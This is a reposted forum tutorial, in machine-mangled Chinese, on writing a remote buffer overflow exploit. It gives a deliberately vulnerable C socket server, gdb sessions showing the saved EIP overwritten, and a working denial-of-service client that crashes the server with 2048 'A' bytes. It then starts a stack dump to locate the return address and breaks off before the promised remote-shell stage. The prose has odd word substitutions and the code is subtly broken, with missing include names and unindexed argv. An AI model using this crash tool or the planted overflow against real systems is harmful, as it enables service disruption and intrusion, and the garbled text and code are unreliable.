写长途缓冲区溢出缝隙使用程序_北京北大青鸟马甸华腾训练-C / C++-优质IT资源分享社区

admin
管理员
管理员
  • UID1
  • 粉丝29
  • 关注4
  • 发帖数581
  • 社区居民
  • 忠实会员
  • 原创写手
阅读:214回复:0

  写长途缓冲区溢出缝隙使用程序_北京北大青鸟马甸华腾训练

楼主#
更多 发布于:2016-05-19 16:25

怎样写长途缓冲区溢出缝隙使用程序

在此,咱们假设有一个有缝隙的效劳器程序(vulnerable.c).

然后写一个 exploit 来使用该缝隙,这么将能得到一个长途 shell。

一、了解有缝隙程序:

---------------------------------------

vulnerable.c ---------------------------------

#include

#include

#include

#define BUFFER_SIZE 1024

#define NAME_SIZE 2048

int handling(int c)

{

char buffer[BUFFER_SIZE],

name[NAME_SIZE];

int bytes;

strcpy(buffer, "My name is:

");

bytes = send(c, buffer,

strlen(buffer), 0);

if (bytes == -1)

return -1;

bytes = recv(c, name,

sizeof(name), 0);

if (bytes == -1)

return -1;

name[bytes - 1] = ’’;

sprintf(buffer, "Hello %s, nice

to meet you!\r\n", name);

bytes = send(c, buffer,

strlen(buffer), 0);

if (bytes == -1)

return -1;

return 0;

}

int main(int argc, char

*argv[])

{

int s, c, cli_size;

struct sockaddr_in srv, cli;

if (argc != 2)

{

fprintf(stderr, "usage: %s

port\n", argv[0]);

return 1;

}

s = socket(AF_INET, SOCK_STREAM,

0);

if (s == -1)

{

perror("socket() failed");

return 2;

}

srv.sin_addr.s_addr =

INADDR_ANY;

srv.sin_port = htons( (unsigned

short int) atol(argv));

srv.sin_family = AF_INET;

if (bind(s, &srv,

sizeof(srv)) == -1)

{

perror("bind() failed");

return 3;

}

if (listen(s, 3) == -1)

{

perror("listen() failed");

return 4;

}

for(;;)

{

c = accept(s, &cli,

&cli_size);

if (c == -1)

{

perror("accept() failed");

return 5;

}

printf("client from %s",

inet_ntoa(cli.sin_addr));

if (handling(c) == -1)

fprintf(stderr, "%s: handling()

failed", argv[0]);

close(c);

}

return 0;

}

----------------------------------------------

EOF------------------------------------------------------

下面将编译并运转该程序:

user@linux:~/ > gcc

vulnerable.c -o vulnerable

user@linux:~/ > ./vulnerable

8080

../vulnerable 8080

阐明你能在8080端口运转该项效劳

user@linux~/ > gdb

vulnerable

GNU gdb 4.18

Copyright 1998 Free Software

Foundation, Inc.

GDB is free software, covered by

the GNU General Public License, and you are

welcome to change it and/or

distribute copies of it under certain conditions.

Type "show copying" to see the

conditions.

There is absolutely no warranty

for GDB. Type "show warranty" for details.

This GDB was configured as

"i386-suse-linux"...

(gdb) run 8080

Starting program:

/home/user/directory/vulnerable 8080

如今该程序监听8080端口并等候衔接。

user@linux:~/ > telnet

localhost 8080

Trying ::1...

telnet: connect to address ::1:

Connection refused

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

My name is: Robin

, nice to meet you!

Connection closed by foreign

host.

user@linux:~/ >

看来没有什么破绽,可是这时gdb会在屏幕上显示:

client from 127.0.0.1 0xbffff28c

(访地址因不同机器类型而异)

二、令有缝隙程序发作缓冲区溢出

从头连上该效劳,为 "My name is:..."

命令行供给超越1024个字节长的输入:

user@linux:~/ > telnet

localhost 8080

Trying ::1...

telnet: connect to address ::1:

Connection refused

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

My name is:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAA

衔接将中止,让咱们看看gdb的输出:

Program received signal SIGSEGV,

Segmentation fault.

0x41414141 in ?? ()

(gdb)

// Don’t close gdb !!

可以看出 eip 被设到了 0x41414141。0x41

代表一个"A",当咱们输入1024个字节时,该程序会企图将字符串name[2048]拷入缓冲[1024]。因而,因为 name[2048]

大于1024字节,name 将会重写缓冲并重写已被存储的 eip,咱们的缓冲将会是下列方式:

[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]

[xxxxx buffer-only-1024-bytes

xxx] [EIP]

在你重写了全部返回地址后,函数将会跳转到过错的地址 0x41414141,然后发生片断过错。

如今为此程序写一个拒绝效劳进犯东西:

---------------------------------

dos.c ---------------------------------------------

#include

#include

#include

#include

#include

int main(int argc, char

**argv)

{

struct sockaddr_in addr;

struct hostent *host;

char buffer[2048];

int s, i;

if(argc != 3)

{

fprintf(stderr, "usage:

%s\n", argv[0]);

exit(0);

}

s = socket(AF_INET, SOCK_STREAM,

0);

if(s == -1)

{

perror("socket() failed\n");

exit(0);

}

host = gethostbyname(argv);

if( host == NULL)

{

herror("gethostbyname()

failed");

exit(0);

}

addr.sin_addr = *(struct

in_addr*)host->h_addr;

addr.sin_family = AF_INET;

addr.sin_port =

htons(atol(argv));

if(connect(s, &addr,

sizeof(addr)) == -1)

{

perror("couldn't connect so

server\n");

exit(0);

}

/* Not difficult only filling

buffer with A’s.... den sending nothing more */

for(i = 0; i < 2048 ;

i++)

buffer = 'A';

printf("buffer is: %s\n",

buffer);

printf("buffer filled... now

sending buffer\n");

send(s, buffer, strlen(buffer),

0);

printf("buffer sent.\n");

close(s);

return 0;

}

---------------------------------------------

EOF ------------------------------------------------------

三、找到返回地址:

翻开gdb寻觅 esp:

(gdb) x/200bx $esp-200

0xbffff5cc: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5d4: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5dc: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5e4: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5ec: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5f4: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff5fc: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff604: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff60c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff614: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff61c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff624: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff62c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff634: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff63c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff644: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff64c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff654: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff65c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff664: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff66c: 0x41 0x41 0x41 0x41

0x41 0x41 0x41 0x41

0xbffff674: 0x41

[font=Tahoma  ]

优质IT资源分享社区为你提供此文。 [font=Tahoma  ][font=Tahoma  ]

本站有大量优质C、C++教程视频,资料等资源,包含C,C++基础教程,高级进阶教程等等,教程视频资源涵盖传智播客,极客学院,达内,北大青鸟,猎豹网校等等IT职业培训机构的培训教学视频,价值巨大。欢迎点击下方链接查看。 [font=Tahoma  ][font=Tahoma  ]

C、C++教程视频

优质IT资源分享社区(www.itziyuan.top)
一个免费,自由,开放,共享,平等,互助的优质IT资源分享网站。
专注免费分享各大IT培训机构最新培训教学视频,为你的IT学习助力!

!!!回帖受限制请看点击这里!!!
!!!资源失效请在此版块发帖说明!!!

[PS:按 CTRL+D收藏本站网址~]

——“优质IT资源分享社区”管理员专用签名~

本版相似帖子

游客